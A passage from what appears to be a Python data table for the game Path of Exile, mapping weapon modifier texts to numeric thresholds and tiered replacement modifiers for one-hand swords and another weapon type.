"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"One Hand Sword": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
